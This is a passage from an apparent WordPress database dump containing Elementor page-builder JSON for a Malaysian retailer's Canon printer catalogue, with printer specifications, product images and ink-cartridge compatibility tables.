width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6867,3294,'_elementor_version','2.5.14'),(6870,3295,'_wp_page_template','template-fullwidth.php'),(6871,3295,'_elementor_edit_mode','builder'),(6872,3295,'_elementor_template_type','post'),(6873,3295,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><br \\/><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td 